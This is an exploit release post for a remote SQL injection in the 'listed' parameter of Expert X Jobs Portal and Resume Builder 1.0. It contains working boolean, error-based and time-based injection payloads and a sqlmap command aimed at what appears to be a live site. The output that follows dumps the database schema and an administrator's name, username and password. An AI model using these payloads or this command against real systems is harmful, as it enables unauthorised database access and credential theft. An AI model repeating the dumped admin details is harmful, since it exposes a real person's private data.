Headline
Expert X Jobs Portal And Resume Builder 1.0 SQL Injection
Expert X Jobs Portal and Resume Builder version 1.0 suffers from a remote SQL injection vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Exploits ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr │ │ :│ Website : wvidesk.com │ │ ││ Vendor : WVIDesk │ │ ││ Software : Expert X - Jobs Portal and │ │ Expert X can manage jobs, courses, ││ Resume Builder v. 1.0 │ │ events and scholarships. ││ Vuln Type: Remote SQL Injection │ │ ││ Method : GET │ │ ││ Impact : Database Access │ │ ││ │ │ ││────────────────────────────────────────────┘ └─────────────────────────────────────────││ B4nks-NET irc.b4nks.tk #unix ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ Typically used for remotely exploitable vulnerabilities that can lead to ││ system compromise. ││ │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost, Carlos132sp, ProGenius CryptoJob (Twitter) twitter.com/CryptozJob┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2022 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'listed' is vulnerable.---Parameter: listed (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: listed=1' AND 6926=6926 AND 'ZFlv'='ZFlv Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: listed=1' AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(6137=6137,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NsfD'='NsfD Type: time-based blind Title: MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment) Payload: listed=1' OR 8793=BENCHMARK(5000000,MD5(0x6643566c))#---[+] Starting the Attacksqlmap.py -u "http://expert.wvidesk.com/companies?listed=1" --current-db --batch --random-agent[INFO] the back-end DBMS is MySQLweb application technology: PHP, Apache, PHP 5.6.40back-end DBMS: MySQL >= 5.0 (MariaDB fork)[23:03:36] [INFO] fetching current database[23:03:36] [INFO] retrieved: 'livexzfv_jobdreamers'current database: 'livexzfv_jobdreamers'fetching tables for database: 'livexzfv_jobdreamers'Database: livexzfv_jobdreamers[56 tables]+---------------------+| adminMenu || applyajob || candidatefeedback || candidatelogin || candidateview || clickcount || controlall || controlcategory || coursecategory || courseinstitute || coursevisitsite || eventcategory || eventtype || jobagentcountry || jobalert || jobcategory || jobcity || jobcompanyinfo || jobcontinent || jobcountry || jobeducationsubject || jobindustry || jobmessage || jobpostingprice || jobquestion || jobseniority || jobuniversity || jobusermaster || jobusertype || jobvisitsite || mainmenu || postacourse || postaevent || postajob || postascholarship || resumeaward || resumecarsum || resumecertificate || resumecomment || resumeeducation || resumelanguage || resumeprofessional || resumepublication || resumeresearch || resumeskill || resumesumexp || resumetraining || resumework || scholarshipperiod || seeker_profile || seekers_admin || siteAdmin || siteadminuser || tbl_countries || tblpage || userrole |+---------------------+fetching columns for table 'siteadminuser' in database 'livexzfv_jobdreamers'Database: livexzfv_jobdreamersTable: siteadminuser[8 columns]+----------+--------------+| Column | Type |+----------+--------------+| aflag | varchar(2) || desig | varchar(200) || enet | varchar(450) || fullname | varchar(450) || id | int(10) || pw | varchar(25) || role | int(10) || users | varchar(200) |+----------+--------------+fetching entries of column(s) 'aflag,desig,enet,fullname,id,pw,role,users' for table 'siteadminuser' in database 'livexzfv_jobdreamers'Database: livexzfv_jobdreamersTable: siteadminuser[1 entry]+-------+------------+--------------------+------------------------+----+------+------+-------+| aflag | desig | enet | fullname | id | pw | role | users |+-------+------------+--------------------+------------------------+----+------+------+-------+| Y | Site Admin | [email protected] | Mohammad Alamgir Kabir | 1 | 5664 | 1 | Kabir |+-------+------------+--------------------+------------------------+----+------+------+-------+[-] Done